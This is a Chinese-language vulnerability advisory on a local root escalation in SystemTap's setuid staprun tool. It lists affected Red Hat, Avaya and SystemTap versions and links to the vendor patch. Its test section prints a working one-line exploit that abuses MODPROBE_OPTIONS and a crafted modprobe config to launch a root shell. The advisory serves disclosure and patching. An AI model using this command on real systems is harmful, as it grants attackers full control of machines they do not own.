SystemTap "modprob"命令环境变量本地权限提升漏洞

受影响系统:

RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux Desktop 4
RedHat Enterprise Linux AS 4 Extras
AVAYA Message Storage Server 5.1
AVAYA Message Storage Server 5.0
AVAYA Message Storage Server 4.0
SystemTap SystemTap 1.1
SystemTap SystemTap 1.0
SystemTap SystemTap 0.0.20090314
SystemTap SystemTap 0.0.20080705

描述:

SystemTap是一种Linux内核诊断工具,允许从运行的Linux内核快速和安全的获取信息。

SystemTap的实现上存在漏洞,本地攻击者可利用此漏洞用超级用户权限执行任意代码,并完全控制受影响的计算机。

setuid-root /usr/bin/staprun程序中存在两个严重的错误。systemtap运行时工具(staprun)没有安全地处理用户指定模块的加载,本地攻击者可利用此漏洞提升其权限。

<*来源:Tavis Ormandy (taviso@gentoo.org
  *>

测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

Tavis Ormandy (taviso@gentoo.org)提供了如下测试方法:

printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C
exploit.conf" staprun -u whatever

建议:

厂商补丁:

SystemTap
———
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://sourceware.org/systemtap/

发表评论?

0 条评论。

发表评论